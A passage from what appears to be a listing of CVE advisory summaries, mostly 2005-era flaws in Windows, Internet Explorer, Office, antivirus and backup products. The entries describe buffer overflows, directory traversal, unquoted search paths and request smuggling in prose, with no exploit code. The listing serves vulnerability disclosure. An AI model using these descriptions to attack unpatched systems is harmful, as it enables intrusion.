Server SP2 and 5.5 SP4, Exchange 2000 SP3, and Office allows remote attackers to execute arbitrary code via an e-mail message with a crafted Transport Neutral Encapsulation Format (TNEF) MIME attachment, related to message length validation. [CVE-2006-0001] Stack-based buffer overflow in Microsoft Publisher 2000 through 2003 allows user-assisted remote attackers to execute arbitrary code via a crafted PUB file, which causes an overflow when parsing fonts. [CVE-2005-4827] Internet Explorer 6.0, and possibly other versions, allows remote attackers to bypass the same origin security policy and make requests outside of the intended domain by calling open on an XMLHttpRequest object (Microsoft.XMLHTTP) and using tab, newline, and carriage return characters within the first argument (method name), which is supported by some proxy servers that convert tabs to spaces. NOTE: this issue can be leveraged to conduct referer spoofing, HTTP Request Smuggling, and other attacks. [CVE-2005-4812] The SISCO OSI stack for Windows, as used by MMS-EASE 7.10 and earlier, AX-S4 MMS 5.01 and earlier, AX-S4 ICCP 3.0103 and earlier, and the ICCP Toolkit for MMS-EASE 4.10 and earlier, allows remote attackers to cause a denial of service (process crash) via certain network traffic, as demonstrated using a Nessus scan. [CVE-2005-4810] Microsoft Internet Explorer 7.0 Beta3 and earlier allows remote attackers to cause a denial of service (crash) via a "text/html" HTML Content-type header sent in response to an XMLHttpRequest (AJAX). [CVE-2005-4703] Apache Tomcat 4.0.3, when running on Windows, allows remote attackers to obtain sensitive information via a request for a file that contains an MS-DOS device name such as lpt9, which leaks the pathname in an error message, as demonstrated by lpt9.xtp using Nikto. [CVE-2005-4697] The Microsoft Wireless Zero Configuration system (WZCS) allows local users to access WEP keys and pair-wise Master Keys (PMK) of the WPA pre-shared key via certain calls to the WZCQueryInterface API function in wzcsapi.dll. [CVE-2005-4696] The Microsoft Wireless Zero Configuration system (WZCS) stores WEP keys and pair-wise Master Keys (PMK) of the WPA pre-shared key in plaintext in memory of the explorer process, which allows attackers with access to process memory to steal the keys and access the network. [CVE-2005-4679] Internet Explorer 6 for Windows XP Service Pack 2 allows remote attackers to spoof the URL in the status bar via the title in an image in a link to a trusted site within a form to the malicious site. [CVE-2005-4579] Multiple HTTP response splitting vulnerabilities in Hitachi Business Logic - Container (BLC) P-2443-9114 01-00 through 02-06 on Windows, and P-1M43-9111 01-01 through 02-00 on AIX, allow remote attackers to inject arbitrary HTTP headers via unknown attack vectors in an unspecified input form. [CVE-2005-4578] Multiple SQL injection vulnerabilities in Hitachi Business Logic - Container (BLC) P-2443-9114 01-00 through 02-06 on Windows, and P-1M43-9111 01-01 through 02-00 on AIX, allow remote attackers to execute arbitrary SQL commands via unknown attack vectors in an unspecified input form. [CVE-2005-4577] Multiple cross-site scripting (XSS) vulnerabilities in Hitachi Business Logic - Container (BLC) P-2443-9114 01-00 through 02-06 on Windows, and P-1M43-9111 01-01 through 02-00 on AIX, allow remote attackers to inject arbitrary web script or HTML via unknown attack vectors in an unspecified input form. [CVE-2005-4505] Unquoted Windows search path vulnerability in McAfee VirusScan Enterprise 8.0i (patch 11) and CMA 3.5 (patch 5) might allow local users to gain privileges via a malicious "program.exe" file in the C: folder, which is run by naPrdMgr.exe when it attempts to execute EntVUtil.EXE under an unquoted "Program Files" path. [CVE-2005-4417] The default configuration of Widcomm Bluetooth for Windows (BTW) 4.0.1.1500 and earlier, as installed on Belkin Bluetooth Software 1.4.2 Build 10 and ANYCOM Blue USB-130-250 Software 4.0.1.1500, and possibly other devices, sets null Authentication and Authorization values, which allows remote attackers to send arbitrary audio and possibly eavesdrop using the microphone via the Hands Free Audio Gateway and Headset profile. [CVE-2005-4210] Opera before 8.51, when running on Windows with Input Method Editor (IME) installed, allows remote attackers to cause a denial of service (persistent application crash) by bookmarking a site with a long title. [CVE-2005-4131] Unspecified vulnerability in Microsoft Excel 2000, 2002, and 2003, in Microsoft Office 2000 SP3 and other packages, allows user-assisted attackers to execute arbitrary code via an Excel file with a malformed range, which could lead to memory corruption involving an argument to the msvcrt.memmove function, aka "Brand new Microsoft Excel Vulnerability," as originally placed for sale on eBay as item number 7203336538. [CVE-2005-4089] Microsoft Internet Explorer allows remote attackers to bypass cross-domain security restrictions and obtain sensitive information by using the @import directive to download files from other domains that are not valid Cascading Style Sheets (CSS) files, as demonstrated using Google Desktop, aka "CSSXSS" and "CSS Cross-Domain Information Disclosure Vulnerability." [CVE-2005-3983] Unknown vulnerability in the login page for HP Systems Insight Manager (SIM) 4.0 and 4.1, when accessed by Microsoft Internet Explorer with the MS04-025 patch, leads to a denial of service (browser hang). NOTE: although the advisory is vague, this issue does not appear to involve an attacker at all. If not, then this issue is not a vulnerability. [CVE-2005-3889] Gadu-Gadu 7.20 allows remote attackers to cause a denial of service via multiple DCC packets with a code of 6 or 7, which triggers a large number of popup windows to the user and creates a large number of threads. [CVE-2005-3886] Unspecified vulnerability in Cisco Security Agent (CSA) 4.5.0 and 4.5.1 agents, when running on Windows systems, allows local users to bypass protections and gain system privileges by executing certain local software. [CVE-2005-3663] Unquoted Windows search path vulnerability in Kaspersky Anti-Virus 5.0 might allow local users to gain privileges via a malicious "program.exe" file in the C: folder. [CVE-2005-3643] IBM DB2 Database server running on Windows XP with Simple File Sharing enabled, allows remote attackers to bypass authentication and log on to the guest account without supplying a password. [CVE-2005-3642] IBM Informix Dynamic Database server running on Windows XP with Simple File Sharing enabled, allows remote attackers to bypass authentication and log on to the guest account by supplying an invalid username. [CVE-2005-3641] Oracle Databases running on Windows XP with Simple File Sharing enabled, allows remote attackers to bypass authentication by supplying a valid username. [CVE-2005-3591] Macromedia Flash plugin (1) Flash.ocx 7.0.19.0 (Windows) and earlier and (2) libflashplayer.so before 7.0.25.0 (Unix) allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via parameters to the ActionDefineFunction ActionScript call in a SWF file, which causes an improper memory access condition, a different vulnerability than CVE-2005-2628. [CVE-2005-3568] db2fmp process in IBM DB2 Content Manager before 8.2 Fix Pack 10 allows local users to cause a denial of service (CPU consumption) by importing a corrupted Microsoft Excel file, aka "CORRUPTED EXEL FILE WILL CAUSE TEXT SEARCH PROCESS LOOPING." [CVE-2005-3483] Buffer overflow in GO-Global for Windows 3.1.0.3270 and earlier allows remote attackers to execute arbitrary code via a data block that is longer than the specified data block size. [CVE-2005-3468] Directory traversal vulnerability in F-Secure Anti-Virus for Microsoft Exchange 6.40 and Internet Gatekeeper 6.40 to 6.42 allows limited remote attackers to bypass Web Console authentication and read files. [CVE-2005-3421] estcmd in Hyper Estraier 1.0.1 on Windows systems allows remote attackers to read unauthorized files via a crafted search request for a filename that contains Unicode characters. [CVE-2005-3312] The HTML rendering engine in Microsoft Internet Explorer 6.0 allows remote attackers to conduct cross-site scripting (XSS) attacks via HTML in corrupted images and other files such as .GIF, JPG, and WAV, which is rendered as HTML when the user clicks on the link, even though the web server response and file extension indicate that it should be treated as a different file type. [CVE-2005-3284] Multiple buffer overflows in AhnLab V3 AntiVirus V3Pro 2004 before 6.0.0.488, V3Net for Windows Server 6.0 before 6.0.0.488, and MyV3, with compressed file scanning enabled, allow remote attackers to execute arbitrary code via crafted (1) ALZ, (2) UUE, or (3) XXE archives. [CVE-2005-3267] Integer overflow in Skype client before 1.4.x.84 on Windows, before 1.3.x.17 on Mac OS, before 1.2.x.18 on Linux, and 1.1.x.6 and earlier allows remote attackers to cause a denial of service (crash) via crafted network data with a large Object Counter value, which leads to a resultant heap-based buffer overflow. [CVE-2005-3265] Buffer overflow in Skype for Windows 1.1.x.0 through 1.4.x.83 allows remote attackers to execute arbitrary code via (1) callto:// and (2) skype:// links, or (3) a non-standard VCARD, possibly due to an underlying error in the SysUtils.WideFmtStr Delphi routine. [CVE-2005-3240] Race condition in Microsoft Internet Explorer allows user-assisted attackers to overwrite arbitrary files and possibly execute code by tricking a user into performing a drag-and-drop action from certain objects, such as file objects within a folder view, then predicting the drag action, and re-focusing to a malicious window. [CVE-2005-3182] Buffer overflow in the HTTP management interface for GFI MailSecurity 8.1 allows remote attackers to execute arbitrary code via long headers such as (1) Host and (2) Accept in HTTP requests. NOTE: the vendor suggests that this issues is "in an underlying Microsoft technology" which, if true, could mean that the overflow affects other products as well. [CVE-2005-3156] Directory traversal vulnerability in printfaq.php in EasyGuppy (Guppy for Windows) 4.5.4 and 4.5.5 allows remote attackers to read arbitrary files via ".." sequences in the pg parameter, which is cleansed for XSS but not directory traversal. [CVE-2005-3077] Microsoft Internet Explorer 5.2.3 for Mac OS allows remote attackers to cause a denial of service (crash) via a web page with malformed attributes in a BGSOUND tag, possibly involving double-quotes in an about: URI. [CVE-2005-3059] Multiple unspecified vulnerabilities in Opera 8.50 on Linux and Windows have unknown impact and attack vectors, related to (1) " handling of must-revalidate cache directive for HTTPS pages" or (2) a "display issue with cookie comment encoding." [CVE-2005-3041] Unspecified "drag-and-drop vulnerability" in Opera Web Browser before 8.50 on Windows allows "unintentional file uploads." [CVE-2005-3030] Directory traversal vulnerability in the archive decompression library in AhnLab V3Pro 2004 build 6.0.0.383, V3 VirusBlock 2005 build 6.0.0.383, and V3Net for Windows Server 6.0 build 6.0.0.383 allows remote attackers to write arbitrary files via a .. (dot dot) in the filename in a compressed archive. [CVE-2005-3029] Stack-based buffer overflow in AhnLab V3Pro 2004 build 6.0.0.383, V3 VirusBlock 2005 build 6.0.0.383, and V3Net for Windows Server 6.0 build 6.0.0.383 allows remote attackers to execute arbitrary code via a long filname in an ACE archive. [CVE-2005-2986] The v3flt2k.sys driver in AhnLab V3Pro 2004 Build 6.0.0.383, V3 VirusBlock 2005 Build 6.0.0.383, V3Net for Windows Server 6.0 Build 6.0.0.383 does not properly validate the source of the DeviceIoControl commands, which allows remote attackers to gain privileges. [CVE-2005-2957] Stack-based buffer overflow in AVIRA Desktop for Windows 1.00.00.68 with AVPACK32.DLL 6.31.0.3, when archive scanning is enabled, allows remote attackers to execute arbitrary code via a long filename in an ACE archive. [CVE-2005-2939] Unquoted Windows search path vulnerability in VMWare Workstation 5.0.0 build-13124 might allow local users to gain privileges via a malicious "program.exe" file in the C: folder. [CVE-2005-2938] Unquoted Windows search path vulnerability in iTunesHelper.exe in iTunes 4.7.1.30 and iTunes 5 for Windows might allow local users to gain privileges via a malicious C:\program.exe file. [CVE-2005-2936] Unquoted Windows search path vulnerability in RealNetworks RealPlayer 10.5 6.0.12.1040 through 6.0.12.1348, RealPlayer 10, RealOne Player v2, RealOne Player v1, and RealPlayer 8 before 20060322 might allow local users to gain privileges via a malicious C:\program.exe file. [CVE-2005-2858] The Fetch.FetchContact.1 ActiveX control (Fetch.dll) for Rediff Bol 7.0 allows remote attackers to read the Windows Address Book via the FullAddressBook method. [CVE-2005-2831] Microsoft Internet Explorer 5.01, 5.5, and 6 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a web page with embedded CLSIDs that reference certain COM objects that are not intended for use within Internet Explorer, aka a variant of the "COM Object Instantiation Memory Corruption Vulnerability," a different vulnerability than CVE-2005-2127. [CVE-2005-2830] Microsoft Internet Explorer 5.01, 5.5, and 6, when using an HTTPS proxy server that requires Basic Authentication, sends URLs in cleartext, which allows remote attackers to obtain sensitive information, aka "HTTPS Proxy Vulnerability." [CVE-2005-2829] Multiple design errors in Microsoft Internet Explorer 5.01, 5.5, and 6 allow user-assisted attackers to execute arbitrary code by (1) overlaying a malicious new window above a file download box, then (2) using a keyboard shortcut and delaying the display of the file download box until the user hits a shortcut that activates the "Run" button, aka "File Download Dialog Box Manipulation Vulnerability." [CVE-2005-2827] The thread termination routine in the kernel for Windows NT 4.0 and 2000 (NTOSKRNL.EXE) allows local users to modify kernel memory and execution flow via steps in which a terminating thread causes Asynchronous Procedure Call (APC) entries to free the wrong data, aka the "Windows Kernel Vulnerability." [CVE-2005-2804] Integer overflow in the registry parsing code in GroupWise 6.5.3, and possibly earlier version, allows remote attackers to cause a denial of service (application crash) via a large TCP/IP port in the Windows registry key. [CVE-2005-2771] WRQ Reflection for Secure IT Windows Server 6.0 (formerly known as F-Secure SSH server) processes access and deny lists in a case-sensitive manner, when previous versions were case-insensitive, which might allow remote attackers to bypass intended restrictions and login to accounts that should be denied. [CVE-2005-2770] WRQ Reflection for Secure IT Windows Server 6.0 (formerly known as F-Secure SSH server) does not properly handle when the Windows Administrator or Guest accounts are renamed after SSH key authentication has been configured, which allows remote attackers to use the original names during login. [CVE-2005-2765] The user interface in the Windows Firewall does not properly display certain malformed entries in the Windows Registry, which makes it easier for attackers with administrator privileges to hide activities if the administrator only uses the Windows Firewall interface to monitor exceptions. NOTE: the vendor disputes this issue, saying that since administrative privileges are already required, it is not a vulnerability. CVE has not yet formally decided if such "information hiding" issues should be included. [CVE-2005-2726] Directory traversal vulnerability in Home Ftp Server 1.0.7 allows remote authenticated users to read arbitrary files via "C:\" (Windows drive letter) sequences in commands such as (1) LIST or (2) RETR. [CVE-2005-2707] Firefox before 1.0.7 and Mozilla Suite before 1.7.12 allows remote attackers to spawn windows without user interface components such as the address and status bar, which could be used to conduct spoofing or phishing attacks. [CVE-2005-2678] Microsoft IIS 5.1 and 6 allows remote attackers to spoof the SERVER_NAME variable to bypass security checks and conduct various attacks via a GET request with an http://localhost URI, which makes it appear as if the request is coming from localhost. [CVE-2005-2611] VERITAS Backup Exec for Windows Servers 8.6 through 10.0, Backup Exec for NetWare Servers 9.0 and 9.1, and NetBackup for NetWare Media Server Option 4.5 through 5.1 uses a static password during authentication from the NDMP agent to the server, which allows remote attackers to read and write arbitrary files with the backup server. [CVE-2005-2573] The mysql_create_function function in sql_udf.cc for MySQL 4.0 before 4.0.25, 4.1 before 4.1.13, and 5.0 before 5.0.7-beta, when running on Windows, uses an incomplete blacklist in a directory traversal check, which allows attackers to include arbitrary files via the backslash (\) character. [CVE-2005-2572] MySQL, when running on Windows, allows remote authenticated users with insert privileges on the mysql.func table to cause a denial of service (server hang) and possibly execute arbitrary code via (1) a request for a non-library file, which causes the Windows LoadLibraryEx function to block, or (2) a request for a function in a library that has the XXX_deinit or XXX_init functions defined but is not tailored for mySQL, such as jpeg1x32.dll and jpeg2x32.dll. [CVE-2005-2551] Buffer overflow in dhost.exe in iMonitor for Novell eDirectory 8.7.3 on Windows allows attackers to cause a denial of service (crash) and obtain access to files via unknown vectors. [CVE-2005-2502] Buffer overflow in AppKit for Mac OS X 10.3.9 and 10.4.2, as used in applications such as TextEdit, allows external user-assisted attackers to execute arbitrary code via a crafted Microsoft Word file. [CVE-2005-2429] Firefox, when opening Microsoft Word documents, does not properly set the permissions on shared sections, which allows remote attackers to write arbitrary data to open applications in Microsoft Office. [CVE-2005-2371] Directory traversal vulnerability in Oracle Reports 6.0, 6i, 9i, and 10g allows remote attackers to overwrite arbitrary files via (1) "..", (2) Windows drive letter (C:), and (3) absolute path sequences in the desname parameter. NOTE: this issue was probably fixed by REP06 in CPU Jan 2006, in which case it overlaps CVE-2006-0289. [CVE-2005-2308] The JPEG decoder in Microsoft Internet Explorer allows remote attackers to cause a denial of service (CPU consumption or crash) and possibly execute arbitrary code via certain crafted JPEG images, as demonstrated using (1) mov_fencepost.jpg, (2) cmp_fencepost.jpg, (3) oom_dos.jpg, or (4) random.jpg. [CVE-2005-2304] Microsoft MSN Messenger 9.0 and Internet Explorer 6.0 allows remote attackers to cause a denial of service (crash) via an image with an ICC Profile with a large Tag Count. [CVE-2005-2274] Microsoft Internet Explorer 6.0 does not clearly associate a Javascript dialog box with the web page that generated it, which allows remote attackers to spoof a dialog box from a trusted site and facilitates phishing attacks, aka the "Dialog Origin Spoofing Vulnerability." [CVE-2005-2226] Microsoft Outlook Express 6.0 leaks the default news server account when a user responds to a "watched" conversation thread, which could allow remote attackers to obtain sensitive information. [CVE-2005-2225] Microsoft MSN Messenger allows remote attackers to cause a denial of service via a plaintext message containing the ".pif" string, which is interpreted as a malicious file extension and causes users to be kicked from a group conversation. NOTE: it has been reported that Gaim is also affected, so this may be an issue in the protocol or MSN servers. [CVE-2005-2224] aspnet_wp.exe in Microsoft ASP.NET web services allows remote attackers to cause a denial of service (CPU consumption from infinite loop) via a crafted SOAP message to an RPC/Encoded method. [CVE-2005-2150] Windows NT 4.0 and Windows 2000 before URP1 for Windows 2000 SP4 does not properly prevent NULL sessions from accessing certain alternate named pipes, which allows remote attackers to (1) list Windows services via svcctl or (2) read eventlogs via eventlog. [CVE-2005-2146] SSH Tectia Server 4.3.1 and earlier, and SSH Secure Shell for Windows Servers, uses insecure permissions when generating the Secure Shell host identification key, which allows local users to access the key and spoof the server. [CVE-2005-2143] Microsoft Front Page allows attackers to cause a denial of service (crash) via a crafted style tag in a web page. [CVE-2005-2127] Microsoft Internet Explorer 5.01, 5.5, and 6 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a web page with embedded CLSIDs that reference certain COM objects that are not intended for use within Internet Explorer, as originally demonstrated using the (1) DDS Library Shape Control (Msdds.dll) COM object, and other objects including (2) Blnmgrps.dll, (3) Ciodm.dll, (4) Comsvcs.dll, (5) Danim.dll, (6) Htmlmarq.ocx, (7) Mdt2dd.dll (as demonstrated using a heap corruption attack with uninitialized memory), (8) Mdt2qd.dll, (9) Mpg4ds32.ax, (10) Msadds32.ax, (11) Msb1esen.dll, (12) Msb1fren.dll, (13) Msb1geen.dll, (14) Msdtctm.dll, (15) Mshtml.dll, (16) Msoeacct.dll, (17) Msosvfbr.dll, (18) Mswcrun.dll, (19) Netshell.dll, (20) Ole2disp.dll, (21) Outllib.dll, (22) Psisdecd.dll, (23) Qdvd.dll, (24) Repodbc.dll, (25) Shdocvw.dll, (26) Shell32.dll, (27) Soa.dll, (28) Srchui.dll, (29) Stobject.dll, (30) Vdt70.dll, (31) Vmhelper.dll, and (32) Wbemads.dll, aka a variant of the "COM Object Instantiation Memory Corruption vulnerability." [CVE-2005-2126] The FTP client in Windows XP SP1 and Server 2003, and Internet Explorer 6 SP1 on Windows 2000 SP4, when "Enable Folder View for FTP Sites" is enabled and the user manually initiates a file transfer, allows user-assisted, remote FTP servers to overwrite files in arbitrary locations via crafted filenames. [CVE-2005-2124] Unspecified vulnerability in the Graphics Rendering Engine (GDI32.DLL) in Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1, related to "An unchecked buffer" and possibly buffer overflows, allows remote attackers to execute arbitrary code via a crafted Windows Metafile (WMF) format image, aka "Windows Metafile Vulnerability." [CVE-2005-2123] Multiple integer overflows in the Graphics Rendering Engine (GDI32.DLL) in Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allow remote attackers to execute arbitrary code via crafted Windows Metafile (WMF) and Enhanced Metafile (EMF) format images that lead to heap-based buffer overflows, as demonstrated using MRBP16::bCheckRecord. [CVE-2005-2119] The MIDL_user_allocate function in the Microsoft Distributed Transaction Coordinator (MSDTC) proxy (MSDTCPRX.DLL) allocates a 4K page of memory regardless of the required size, which allows attackers to overwrite arbitrary memory locations using an incorrect size value that is provided to the NdrAllocate function, which writes management data to memory outside of the allocated buffer. [CVE-2005-2089] Microsoft IIS 5.0 and 6.0 allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes IIS to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling." [CVE-2005-2087] Internet Explorer 5.01 SP4 up to 6 on various Windows operating systems, including IE 6.0.2900.2180 on Windows XP, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a web page with embedded CLSIDs that reference certain COM objects that are not ActiveX controls, as demonstrated using the JVIEW Profiler (Javaprxy.dll). NOTE: the researcher says that the vendor could not reproduce this problem. [CVE-2005-2080] Unknown vulnerability in Remote Agent for Windows Servers (RAWS) in VERITAS Backup Exec 9.0 through 10.0 for Windows, and 9.0.4019 through 9.1.307 for NetWare, allows remote attackers to gain privileges by copying the handle for the server. [CVE-2005-2079] Heap-based buffer overflow in the Admin Plus Pack Option for VERITAS Backup Exec 9.0 through 10.0 for Windows Servers allows remote attackers to execute arbitrary code. [CVE-2005-1970] Symantec pcAnywhere 10.5x and 11.x before 11.5, with "Launch with Windows" enabled, allows local users with physical access to execute arbitrary commands via the Caller Properties feature. [CVE-2005-1935] Heap-based buffer overflow in the BERDecBitString function in Microsoft ASN.1 library (MSASN1.DLL) allows remote attackers to execute arbitrary code via nested constructed bit strings, which leads to a realloc of a non-null pointer and causes the function to overwrite previously freed memory, as demonstrated using a SPNEGO token with a constructed bit string during HTTP authentication, and a different vulnerability than CVE-2003-0818. NOTE: the researcher has claimed that MS:MS04-007 fixes this issue. [CVE-2005-1929] Multiple heap-based buffer overflows in (1) isaNVWRequest.dll and (2) relay.dll in Trend Micro ServerProtect Management Console 5.58 and earlier, as used in Control Manager 2.5 and 3.0 and Damage Cleanup Server 1.1, allow remote attackers to execute arbitrary code via "wrapped" length values in Chunked transfer requests. NOTE: the original report suggests that the relay.dll issue is related to a problem in which a Microsoft Foundation Classes (MFC) static library returns invalid values under heavy load. As such, this might not be a vulnerability in Trend Micro's product. [CVE-2005-1928] Trend Micro ServerProtect EarthAgent for Windows Management Console 5.58 and possibly earlier versions, when running with Trend Micro Control Manager 2.5 and 3.0, and Damage Cleanup Server 1.1, allows remote attackers to cause a denial of service (CPU consumption) via a flood of crafted packets with a certain "magic value" to port 5005, which also leads to a memory leak. [CVE-2005-1907] The ISA Firewall service in Microsoft Internet Security and Acceleration (ISA) Server 2000 allows remote attackers to cause a denial of service (Wspsrv.exe crash) via a large amount of SecureNAT network traffic. [CVE-2005-1905] The klif.sys driver in Kaspersky Labs Anti-Virus 5.0.227, 5.0.228, and 5.0.335 on Windows 2000 allows local users to gain privileges by modifying certain critical code addresses that are later accessed by privileged programs. [CVE-2005-1829] Microsoft Internet Explorer 6 SP2 allows remote attackers to cause a denial of service (infinite loop and application crash) via two embedded files that call each other. [CVE-2005-1794] Microsoft Terminal Server using Remote Desktop Protocol (RDP) 5.2 stores an RSA private key in mstlsapi.dll and uses it to sign a certificate, which allows remote attackers to spoof public keys of legitimate servers and conduct man-in-the-middle attacks. [CVE-2005-1792] Memory leak in Windows Management Instrumentation (WMI) service allows attackers to cause a denial of service (memory consumption and crash) by creating security contexts more quickly than they can be cleared from the RPC cache. [CVE-2005-1791] Microsoft Internet Explorer 6 SP2 (6.0.2900.2180) crashes when the user attempts to add a URI to the restricted zone, in which the full domain name of the URI begins with numeric sequences similar to an IP address. NOTE: if there is not an exploit scenario in which an attacker can trigger this behavior, then perhaps this issue should not be included in CVE. [CVE-2005-1790] Microsoft Internet Explorer 6 SP2 6.0.2900.2180 and 6.0.2800.1106, and earlier versions, allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a Javascript BODY onload event that calls the window function, aka "Mismatched Document Object Model Objects Memory Corruption Vulnerability." [CVE-2005-1766] Heap-based buffer overflow in rtffplin.cpp in RealPlayer 10.5 6.0.12.1056 on Windows, and 10, 10.0.1.436, and other versions before 10.0.5 on Linux, allows remote attackers to execute arbitrary code via a RealMedia file with a long RealText string, such as an SMIL file. [CVE-2005-1719] Unknown vulnerability in ALWIL avast! antivirus 4 (4.6.6230) and earlier, when running on Windows NT 4.0, does not properly detect certain viruses. [CVE-2005-1683] Buffer overflow in winword.exe 10.2627.6714 and earlier in Microsoft Word for the Macintosh, before SP3 for Word 2002, allows remote attackers to cause a denial of service and possibly execute arbitrary code via a crafted mcw file. [CVE-2005-1665] The __VIEWSTATE functionality in Microsoft ASP.NET 1.x, when not cryptographically signed, allows remote attackers to cause a denial of service (CPU consumption) via deeply nested markup. [CVE-2005-1664] The __VIEWSTATE functionality in Microsoft ASP.NET 1.x allows remote attackers to conduct replay attacks to (1) apply a ViewState generated from one view to a different view, (2) reuse ViewState information after the application's state has changed, or (3) use the ViewState to conduct attacks or expose content to third parties. [CVE-2005-1649] The IPv6 support in Windows XP SP2, 2003 Server SP1, and Longhorn, with Windows Firewall turned off, allows remote attackers to cause a denial of service (CPU consumption) via a TCP packet with the SYN flag set and the same destination and source address and port, a variant of CVE-2005-0688 and a reoccurrence of the "Land" vulnerability (CVE-1999-0016). [CVE-2005-1590] The Altiris Client Service for Windows (ACLIENT.EXE) 6.0.88 allows local users to disable password protection and access the administrative interface by finding and showing the "Altiris Client Service" hidden window, disabling the password protection, disabling the "Hide client tray icon box" option, then opening the AClient tray icon and using the View Log File option, a different vulnerability than CVE-2004-2070. [CVE-2005-1576] The file download dialog in Mozilla Firefox 0.10.1 and 1.0 for Windows uses the Content-Type HTTP header to determine the file type, but saves the original file extension when "Save to Disk" is selected, which allows remote attackers to hide the real file types of downloaded files. [CVE-2005-1575] The file download dialog in Mozilla Firefox 0.10.1 and 1.0 for Windows allows remote attackers to hide the real file types of downloaded files via the Content-Type HTTP header and a filename containing whitespace, dots, or ASCII byte 160. [CVE-2005-1574] Windows Media Player 9 and 10, in certain cases, allows content protected by Windows Media Digital Rights Management (WMDRM) to redirect the user to a web site to obtain a license, even when the "Acquire licenses automatically for protected content" setting is not enabled. [CVE-2005-1407] Skype for Windows 1.2.0.0 to 1.2.0.46 allows local users to bypass the identity check for an authorized application, then call arbitrary Skype API functions by modifying or replacing that application. [CVE-2005-1346] Multiple Symantec AntiVirus products, including Norton AntiVirus 2005 11.0.0, Web Security Web Security 3.0.1.72, Mail Security for SMTP 4.0.5.66, AntiVirus Scan Engine 4.3.7.27, SAV/Filter for Domino NT 3.1.1.87, and Mail Security for Exchange 4.5.4.743, when running on Windows, allows remote attackers to cause a denial of service (component crash) and avoid detection via a crafted RAR file. [CVE-2005-1286] Unquoted Windows search path vulnerability in BitDefender 8 allows local users to prevent BitDefender from starting by creating a malicious C:\program.exe, possibly due to the lack of quoting of the full pathname when executing a process. [CVE-2005-1272] Stack-based buffer overflow in the Backup Agent for Microsoft SQL Server in BrightStor ARCserve Backup Agent for SQL Server 11.0 allows remote attackers to execute arbitrary code via a long string sent to port (1) 6070 or (2) 6050. [CVE-2005-1216] Microsoft ISA Server 2000 allows remote attackers to connect to services utilizing the NetBIOS protocol via a NetBIOS connection with an ISA Server that uses the NetBIOS (all) predefined packet filter. [CVE-2005-1215] Microsoft ISA Server 2000 allows remote attackers to poison the ISA cache or bypass content restriction policies via a malformed HTTP request packet containing multiple Content-Length headers. [CVE-2005-1214] Microsoft Agent allows remote attackers to spoof trusted Internet content and execute arbitrary code by disguising security prompts on a malicious Web page. [CVE-2005-1213] Stack-based buffer overflow in the news reader for Microsoft Outlook Express (MSOE.DLL) 5.5 SP2, 6, and 6 SP1 allows remote malicious NNTP servers to execute arbitrary code via a LIST response with a long second field. [CVE-2005-1212] Buffer overflow in Microsoft Step-by-Step Interactive Training (orun32.exe) allows remote attackers to execute arbitrary code via a bookmark link file (.cbo, cbl, or .cbm extension) with a long User field. [CVE-2005-1211] Buffer overflow in the PNG image rendering component of Microsoft Internet Explorer allows remote attackers to execute arbitrary code via a crafted PNG file. [CVE-2005-1191] The Web View DLL (webvw.dll), as used in Windows Explorer on Windows 2000 systems, does not properly filter an apostrophe ("'") in the author name in a document, which allows attackers to execute arbitrary script via extra attributes when Web View constructs a mailto: link for the preview pane when the user selects the file. [CVE-2005-1185] Unquoted Windows search path vulnerability in Musicmatch Jukebox 10.00.2047 and earlier allows local users to gain privileges via a malicious C:\program.exe file, which is run by MMFWLaunch.exe when it attempts to execute launch.exe. [CVE-2005-1182] Unknown vulnerability in Incoming Remote Command (iSeries Access for Windows Remote Command service) in IBM OS/400 R510, R520, and R530 allows attackers to cause a denial of service (IRC shutdown) via certain inputs. [CVE-2005-1150] Unknown vulnerability in Sun Java System Web Server 6.0 SP7 and earlier, when running on Windows systems, allows attackers to cause a denial of service (hang). [CVE-2005-1106] PictureViewer in QuickTime for Windows 6.5.2 allows remote attackers to cause a denial of service (application crash) via a GIF image with the maximum depth start value, possibly triggering an integer overflow. [CVE-2005-1052] Microsoft Outlook 2003 and Outlook Web Access (OWA) 2003 do not properly display comma separated addresses in the From field in an e-mail message, which could allow remote attackers to spoof e-mail addresses. [CVE-2005-1045] OpenText FirstClass 8.0 client does not properly sanitize strings before passing them to the Windows ShellExecute API, which allows remote attackers to execute arbitrary commands via a UNC path in a bookmark. [CVE-2005-0954] Windows Explorer and Internet Explorer in Windows 2000 SP1 allows remote attackers to cause a denial of service (CPU consumption) via a malformed Windows Metafile (WMF) file. [CVE-2005-0944] Unknown vulnerability in Microsoft Jet DB engine (msjet40.dll) 4.00.8618.0, related to insufficient data validation, allows remote attackers to execute arbitrary code via a crafted mdb file. [CVE-2005-0921] Microsoft Outlook 2002 Connector for IBM Lotus Domino 2.0 allows local users to save passwords and login credentials locally, even when password caching is disabled by a group policy. [CVE-2005-0904] Remote Desktop in Windows XP SP1 does not verify the "Force shutdown from a remote system" setting, which allows remote attackers to shut down the system by executing TSShutdn.exe. [CVE-2005-0871] calendar_scheduler.php in Topic Calendar 1.0.1 module for phpBB, when running on a Microsoft IIS server, allows remote attackers to obtain sensitive information via invalid parameters, which reveal the path in an error message. [CVE-2005-0820] Microsoft Office InfoPath 2003 SP1 includes sensitive information in the Manifest.xsf file in a custom .xsn form, which allows attackers to obtain printer and network information, obtain the database name, username, and password, or obtain the internal web server name. [CVE-2005-0803] The GetEnhMetaFilePaletteEntries API in GDI32.DLL in Windows 2000 allows remote attackers to cause a denial of service (application crash) via a crafted Enhanced Metafile (EMF) file that causes invalid (1) end, (2) emreof, or (3) palent offsets to be used, aka "Enhanced Metafile Vulnerability." [CVE-2005-0773] Stack-based buffer overflow in VERITAS Backup Exec Remote Agent 9.0 through 10.0 for Windows, and 9.0.4019 through 9.1.307 for Netware allows remote attackers to execute arbitrary code via a CONNECT_CLIENT_AUTH request with authentication method type 3 (Windows credentials) and a long password argument. [CVE-2005-0772] VERITAS Backup Exec 9.0 through 10.0 for Windows Servers, and 9.0.4019 through 9.1.307 for Netware, allows remote attackers to cause a denial of service (Remote Agent crash) 